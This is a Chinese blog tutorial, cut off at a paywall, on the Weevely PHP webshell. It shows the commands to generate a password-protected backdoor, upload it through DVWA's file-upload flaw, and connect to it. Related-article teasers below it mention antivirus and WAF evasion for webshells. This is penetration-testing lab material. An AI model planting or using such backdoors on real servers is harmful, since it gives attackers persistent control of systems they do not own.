Web后门工具weevley

最新推荐文章于 2023-11-20 15:52:29 发布
原创 最新推荐文章于 2023-11-20 15:52:29 发布 · 789 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

Weevley是一个开源的Webshell工具,提供类似Telnet的连接功能,支持HTTP、SOCKS代理及Tor匿名网络。本文介绍了其在DVWA的File Upload漏洞中生成并利用PHP后门的过程,并展示了如何通过代理隐藏自身,以及利用不同模块进行操作。

weevley简介

Weevely是一款开源项目.只支持(PHP) Webshell,可以模拟类似Telnet的连接,Weevely支持HTTP和SOCKS代理并使用Tor匿名网络。开源 https://github.com/epinna/weevely3

演示

靶机 dvwa  Vulnerability: File Upload low

生成后门

weevely generate <password 设置密码> <path 路径可以指定绝对路径> 
weevely generate 123456 test.php
Generated 'test.php' with password '123456' of 742 byte size.

生成的test.php后门上传到服务器  复制URL链接

weevely http://192.168.1.108/dvwa/hackable/uploads/test.php 123456 
[+] weevely 3.6.2

[+] Target:	192.168.1.108
[+] Session:	/root/.weevely/sessions/192.168.1.108/test_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
<
最低0.47元/天 解锁文章
安卓后门工具:backdoor-apk 教程
Sumarua的博客
07-26 8467
文章目录安卓后门工具:backdoor-apk 教程backdoor-apk 下载、安装、使用教程1、下载backdoor-apk2、下载完成后我们进入到其文件目录下:3、在当前目录下,我们可以看到一个脚本文件。4、Android清单权限选项:如何判断后门APK是否生成 成功?5、成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:6、同时,我将生成的带有后门的 AP
md后门工具
06-21
MDm.exe是一个后门工具,可以下载使用。。
NetCat后门工具
01-25
Netcat,Windows后门工具,希望能够遵守相关法律,谢谢
rootkit后门工具
06-09
抓鸡入侵过程中建立系统超级隐藏帐户。。。。。。。。。。。。
全自动Web后门扫描(转)
weixin_34146986的博客
01-09 381
阅读目录 工具介绍 使用方法   工具介绍 这是一款全自动Web后门查杀工具,基于Python开发 某些较新的后门可能会查杀失败 规则列表来自seay博客 回到顶部 使用方法 1.按恶意代码查杀: python Scan_webshell.py 目录名 2.按修改时间查杀: python Scan_webshell.py 目录名 修改时间(格式:"2016-01-...
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 727
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
精选资源
web木马后门查杀工具.zip
11-15
web木马后门查杀工具
linux查杀web后门webshell
it知识分享 free for nothing..
09-01 1654
linux查杀web后门webshell
精选资源
Web后门一键扫描WebShellKiller.zip
04-10
Web后门一键扫描WebShellKiller
精选资源
三款查找PHP ASP 后门工具,一款在线的,两款软件版。.zip
09-26
三款查找PHP ASP 后门工具,一款在线的,两款软件版。
MSF:Web 后门
weixin_46104215的博客
11-21 2139
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
Kali Linux之常见后门工具介绍
weixin_34061042的博客
02-26 2032
1、Meterpreter 它是Metasploit框架中功能强大的后渗透模块。可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。 命令        作用 sessions     查看会话ID信息 idletime     显示目标主机截止当前无操作命令的时间 webcam_snap  抓取目标主机的摄像头,将拍摄的内容保存...
WEB程序中隐藏后门
04-15 857
 作者: 空虚浪子心  在很多商业程序中,程序员也许会出于某种目的,在程序中留下后门。我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个“终极后门”。首先给大家看一个例子,去年我写了一篇文章《对校园网的第二次安全检测,文中提到一个类似的后门:“…隐藏账户做后门!…如果不是我先拿到数据库,分析了一段时间以后才拿到程序,相信我也不会注意这个问题。某账户,在后台查询管理员账户的时候,他不出现,在管
从入侵排查中发现的主要WEB后门扫描工具无法识别的WebShell
SecGuard
06-20 1041
背景:早上发现安全监控系统告警,某服务器存在Webshell 访问这个后门(shopex4s7.php),吓我一跳,我胆小啊: 查看该后门创建及访问时间: 锁定攻击ip与访问时间,发现了另一个新的后门链接: 接着溯源发现攻击者通过某个富文本编辑器上传的后门,备份清理后门,堵上漏洞。。。。 重点来了: 访问该大马anchor.php,功能很强大: 问题是,主机入侵检测系...
weevely使用小结
weixin_52268949的博客
01-27 607
Weevely 写在前面 由于比赛不确定会不会提供菜刀或者蚁剑,这里我稍微对weevely进行简单介绍一下,具体还是请看官方文档,官方文档讲的很详细(前提你英语嘚不错) 官方文档:https://github.com/epinna/weevely3/wiki/Getting-Started 一般几个步骤就如下 1、在终端输入weevely查看基本使用方法 2、generate一个后门代理(backdoor agent) weevely会给你自动生成,不用自己写。我这里是默认存在/root/agent.ph
浅谈web后门隐藏与检测思路
weixin_34116110的博客
09-19 236
跟我一起念后门口诀:挑、改、藏、隐 来个例子先,例一: 只因为在目录里多瞅了一眼,只一眼,就认出了你。为什么你是那么的出众? 可疑点:文件名、时间、大小。(有点经验的人能很快发现这些上传的木马文件) 1. 后门的选择 安全可靠(无隐藏后门,功能稳定。可以从可信度高的地方获取可靠的木马) 多兵种搭配(小马、大马、变态马) 常规马链接: http://www.xxxxxx.o...
五大后门连接工具&木马免杀初级思路
weixin_54882883的博客
08-25 1581
在我们上传木马的时候,经常会遇到木马查杀,木马上传上去了突然被杀了删除了,有时候木马上传了,但是连不上去,这是在getshell中经常遇到的问题,那么当遇到这种问题,就需要让木马绕过网站上WAF的一些查杀等等问题了。那么这个时候POST还需将我们要执行的代码命令等等进去传送给assert函数。但是eval不能直接在URL中添加所以用assert来代替。其实assert和eval的功能上是差不多。检测机制检测就是未知代码不知道。为什么e=assert呢。那么这个地址就是后门地址。加密其实就是把木马加密了。..
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4178
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Web后门知识详解
哆啦安全
11-07 457
原文链接 Web后门知识详解 欢迎关注微信公众号:哆啦安全,后续可以第一时间收到推送的更多干货文章。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值